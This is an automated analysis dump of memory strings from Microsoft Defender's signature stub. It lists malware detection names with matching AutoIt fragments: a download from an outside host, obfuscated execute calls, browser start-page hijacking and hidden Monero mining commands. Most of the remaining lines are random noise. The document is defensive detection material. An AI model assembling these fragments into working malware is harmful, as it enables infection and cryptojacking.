Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: dim $
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ] = [ "
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0.exe" , "
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: `.exe" ]
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#alf:hstr:autoit_rc4encodefunc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0f84dc000000b90001000088c82c0188840deffeffffe2f38365f4008365fc00817dfc00010000
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 7d478b45fc31d2f775f0920345100fb6008b4dfc0fb68c0df0feffff01c80345f425ff000000
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: return shellexecute ( $sfilepath , "" , @workingdir , "print" , $ishow = default @sw_hide $ishow )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: dllcall ( "shell32.dll" , "ulong_ptr" , "shellexecutew" , "hwnd" , $hparent , $stypeofverb , $sverb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: dllcall ( "shell32.dll" , "int" , "shfileoperationw"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "performing backup only"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: runwait ( @comspec & " /c "
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/racealer.pa!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: inetget ( "
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ://professorlog.xyz/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .zip" , "
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .zip" )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: = objcreate ( "shell.application" )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: run ( "c:\users\public\run
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .exe" )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#tel:trojan:win32/injectorautoit.sq!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 4dllopen ( "advapi32.dll" )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: func _crypt_encryptdata ( $
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: p = true )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: dobjcreate ( "msxml2.domdocument" )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0.datatype = "bin.base64"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: return seterror (
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#tel:trojan:autoit/salvagedawn.b!dha
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: -dwv1.3.au3.509"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $"4054656d70446972"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "313232"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "3937"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: "0x457865637574652842696e617279746f737472696e672827307834353738363536333735373436353238343236
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 633323339323732393239272929"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#hstr:win32/predator.ar_3108!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: global $d3076 = execute
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: dim $t31qy644 = $d3076 ( "chr" )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $t31qy644 ( 303 + -204 ) & $t31qy644 ( 315 + -204 ) & $t31qy644 ( 304 + -204 ) & $t31qy644 ( 305 + -204 )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 ) & $t31qy644 ( 312 + -204 )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $r323038323oc0a ( $n32313731jj , $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $m323130303w3e ( $u33lrw44yn ) & $t31qy644 ( 297 + -204 ) , $r32313131va5m7zl )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#alf:hstr:trojan:win32/startpage.zw!bit
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "start page"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "default_page_url"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "search bar"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#alf:ransom:win32/tron.pb!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $extension = "
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: guicreate ( "
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: _filecreate ( @appdatadir & "\network\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: _filecreate ( @localappdatadir & "\microsoft\windows\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: filecopy ( "c:\programdata\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: " , "c:\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#allowlist:bonzo
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_outfile=helpnew.exe
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_res_description=bonzo uvnc-helper
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_res_companyname=bonzo
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_run_before=echo ""1"" >""c:\users\bonzo\temp\lock"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_run_after=copy ""%out%"" ""c:\users\bonzo\temp"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: global $sservicename = "tvnserver"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: global $option_update = "http://bonzo.lublin.pl/help/helpnew.exe"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/coinminer.pa!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: opt ( "trayiconhide" , 0 )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: -p x -k --nicehash -a rx/0 --max-cpu-usage=25" , "" , @sw_hide )
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: run ( @comspec & " /c " & "%localappdata%\temp\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: \webhelper.exe
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0-o strat
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ://xmr.2miners.com
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ://randomxmonero.usa-east.nicehash.com
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/autoitinject.sd!mtb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ( "6c6c5374727563744765745074722824744275666629290x446c6c5374727563744372656174652822627974655b222026202469506c61696e54657874536
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ( "666292c202264776f7264222c2031290x446c6c43616c6c2824646c6c68616e646c652c2022626f6f6c222c202243727970744861736844617461222c2022
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ( "6c222c204578656375746528225472756522292c202264776f7264222c20302c20227374727563742a222c20r
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: bw}v=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 7vq7
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: =ij.f^
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ; _:p
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: :zq)pi
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [ov(jm
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ms2-r$
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: f4&cyh
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: zirhm
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: |o9${
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [(;besk
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ~vn[[pf
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: un fwc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: *=<l[
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [g+qg
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 4r#xc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: .1".vf
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: <fz_d
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: egn7cli(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: lun55
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: tpab[
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: nrt;=
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [y(*~
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: p%:u0
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: n[p ojsjj
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ?{-gw
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: n}e;bz
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: m}r.g
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: atj$z<)
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: i1xb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: e>`])
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0zcwc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: nhr78x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ##db~b
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: @i{yhgx
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: -9|[3
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: k4tly
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 'lca!
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: d%dw&{"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ]zg,
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: *u}dx
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: v4~m@
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: c<+np%dszx
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: mr]y5
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: @-]^z
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ge[u8&
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: wf61zs
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ja^ze
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: -+j'=q
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 7]</^mv
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ]jfq-'+
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: x=o%o%w
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: |-mto
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ojp|bhd
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: h(`vla
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: =>7=r
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 0+l+n>
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: )m%n)\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: j5t6d"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: cc.jb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: #ul57p
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ^gv*f
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: you*'
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: trym7d
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &u@0e
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: *{n&}`
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: $23r
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: }#+u0
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: fblu~
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: n1a%s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ~<n+s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: x$)*@
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: bozcj1
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: n^rht
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ;ugup
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: zpp~q]
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: y\b|
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: gkld
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: }k'|!
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ehcmp@
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: m?ht_7+v
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ?8;0]urk
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: nybp0
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: )l2j~q
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: vy9xt
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: g&).g
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 6#,3x
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: a2,bb
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 7%3%?
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: i`'dy{
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 1v<20
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: w}cji
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 7|p7q2}
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 7ju(8
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ikc9u
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: c\sp}
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 8c%gm
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ($.7c-
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: s5h3n9
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: snpy(\(i
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: k!711~
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: i"lpy8\
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ji*e@;
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: '[z5wj
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: z9`d6
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: /q<4o
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 2;||7
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: e_ju4
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: y&yxqc
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: \(5,_!
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: b'cp/p
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ?.>7r
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: k~]pdzjso
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: 'p2_s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: rxhgruyd
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: &`\li
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: k~[rm
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: [vywx?z
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: defxj
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: sl=v:
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: +*<~s
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: #fkk(3
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: \@|ux"
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: gxctu
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: b&m;]
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: pbg,l
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: tpx;@=z
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: (-?s84
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: `ln"m
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: `ln"mm(
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: /<|rx
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: an['y
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: mbli_g3
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ep]m|
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: g{~</ba
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: b':'0
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: dp|7^
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: ]9;xo`
